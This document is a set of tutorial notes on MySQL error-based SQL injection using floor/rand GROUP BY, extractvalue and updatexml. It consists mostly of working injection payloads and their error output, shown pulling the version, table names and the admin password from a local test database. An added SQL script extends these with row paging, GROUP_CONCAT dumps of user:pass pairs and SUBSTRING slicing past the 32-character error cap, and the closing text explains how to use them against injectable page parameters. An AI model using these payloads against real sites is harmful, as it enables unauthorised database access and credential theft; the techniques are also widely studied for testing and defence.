Posting some of my old notes. When MySQL fails to execute a statement it throws an error message, and PHP+MySQL sites often print that error message straight onto the page. The three methods below use that behaviour to pull specific data out through the error text.
Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor
The following payloads can be used. The trick is that floor(rand(0)*2) is evaluated once when the GROUP BY temporary table looks a key up and again when it inserts it, so the same key value turns up twice and MySQL reports the duplicate key, together with whatever was concatenated in front of it, in the error message. The derived table being grouped must produce at least three rows for the collision to occur.

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
The MySQL version is leaked in the duplicate key; the trailing 1 is the floor(rand(0)*2) value, not part of the version string. To read other data, replace version() with the subquery you want, as long as it returns a single value.
For example, to read the administrator user name and password:
Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
In both cases the password is admin888; the final 1 is again the floor() value. Method 2 does not depend on information_schema being readable: the three-row union (1, NULL, 0) is enough to make the key collide.
2. ExtractValue
Test statement (needs MySQL 5.1.5 or later, where the XML functions were added):

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
0x5c is a backslash, which is not valid at the start of an XPath expression, so the parser rejects the string and echoes it back in the error. The error message only shows the first 32 characters, so longer values have to be read in pieces with substring().
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
0x5e24 is '^$', used as a marker on both sides of the value; the same 32-character limit applies as with extractvalue. The comparison 1=(...) is never evaluated, because the error is raised while parsing the XPath argument.
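As an added example (not part of the original notes and not output from the author's test box), the script below rebuilds the test database described at the top of the page with constructed sample rows, then runs all three techniques in the forms they are actually used during extraction: walking rows with LIMIT offsets, fencing the value so the trailing floor() digit cannot be mistaken for data, and slicing long values with SUBSTRING() to get past the 32-character cap on the XPath error text. The second admin row and its long password are made-up data; the table and column names are those from the page.

```sql
-- Added example: rebuilds the page's test schema with constructed rows
-- and exercises the three error-based extraction primitives.
-- Requires MySQL 5.1.5+ (extractvalue/updatexml). Every probe below is
-- expected to end in an error, so run it interactively or with
-- `mysql --force` so the client does not stop at the first one.
CREATE DATABASE IF NOT EXISTS test;
USE test;

DROP TABLE IF EXISTS admin;
CREATE TABLE admin (
  id   INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
  user VARCHAR(50) NOT NULL,
  pass VARCHAR(50) NOT NULL
);
-- Constructed sample rows: the second password is 43 characters long,
-- so it overflows the 32-character XPath error window.
INSERT INTO admin (user, pass) VALUES
  ('admin',  'admin888'),
  ('editor', 'this_password_is_much_longer_than_32_chars!');

DROP TABLE IF EXISTS article;
CREATE TABLE article (
  id      INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
  title   VARCHAR(50) NOT NULL,
  content VARCHAR(50) NOT NULL
);
INSERT INTO article (title, content) VALUES ('test', 'do it');

-- 1. floor(rand(0)*2) + GROUP BY.
-- floor(rand(0)*2) yields 0,1,1,0,1,1,...; the GROUP BY temp table
-- computes the key once to look it up and again to insert it, so the
-- key ending in 1 is inserted on row 1 and inserted again on row 3,
-- which raises the duplicate-key error carrying the concatenated value.
-- With fewer than 3 rows in the grouped derived table the collision
-- never happens; 1 UNION NULL UNION !1 supplies exactly three (1, NULL, 0).
-- 0x7e ('~') fences the value so the trailing floor() digit stays
-- unambiguous even when the data itself ends in a digit.
SELECT * FROM article WHERE id = 1 AND (SELECT COUNT(*)
  FROM (SELECT 1 UNION SELECT NULL UNION SELECT !1) x
  GROUP BY CONCAT(0x7e, (SELECT user FROM admin LIMIT 0,1), 0x7e, FLOOR(RAND(0)*2)));

-- Next row: advance the LIMIT offset (0,1 -> 1,1 -> 2,1 ...) until the
-- scalar subquery returns NULL and the error stops carrying data.
SELECT * FROM article WHERE id = 1 AND (SELECT COUNT(*)
  FROM (SELECT 1 UNION SELECT NULL UNION SELECT !1) x
  GROUP BY CONCAT(0x7e, (SELECT pass FROM admin LIMIT 1,1), 0x7e, FLOOR(RAND(0)*2)));

-- Several rows in one error. The concatenated list is capped by
-- group_concat_max_len (default 1024), so big tables still need paging.
SELECT * FROM article WHERE id = 1 AND (SELECT COUNT(*)
  FROM (SELECT 1 UNION SELECT NULL UNION SELECT !1) x
  GROUP BY CONCAT(0x7e, (SELECT GROUP_CONCAT(user, 0x3a, pass) FROM admin),
                  0x7e, FLOOR(RAND(0)*2)));

-- 2. extractvalue(). 0x5c ('\') is illegal at the start of an XPath
-- expression, so the parser fails at once and echoes the string in the
-- error, but only its first 32 characters (31 payload characters after
-- the backslash). Long values are therefore read 31 characters at a time.
SELECT * FROM article WHERE id = 1
  AND EXTRACTVALUE(1, CONCAT(0x5c, SUBSTRING((SELECT pass FROM admin LIMIT 1,1), 1, 31)));
SELECT * FROM article WHERE id = 1
  AND EXTRACTVALUE(1, CONCAT(0x5c, SUBSTRING((SELECT pass FROM admin LIMIT 1,1), 32, 31)));

-- 3. updatexml(): same parser, same 32-character window. 0x5e24 ('^$')
-- marks both ends of the value, so a truncated tail is easy to spot.
-- Listing the tables of the current database in one shot:
SELECT * FROM article WHERE id = 1
  AND 1 = UPDATEXML(1, CONCAT(0x5e24,
        (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables
          WHERE table_schema = DATABASE()), 0x5e24), 1);
```

The same LIMIT/SUBSTRING stepping applies to any column: in an injection the part after `id = 1` is what goes into the parameter, and the marker characters (0x7e, 0x5c, 0x5e24) are what you grep for in the page's error output.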
That's all. Thanks to the foreign guys.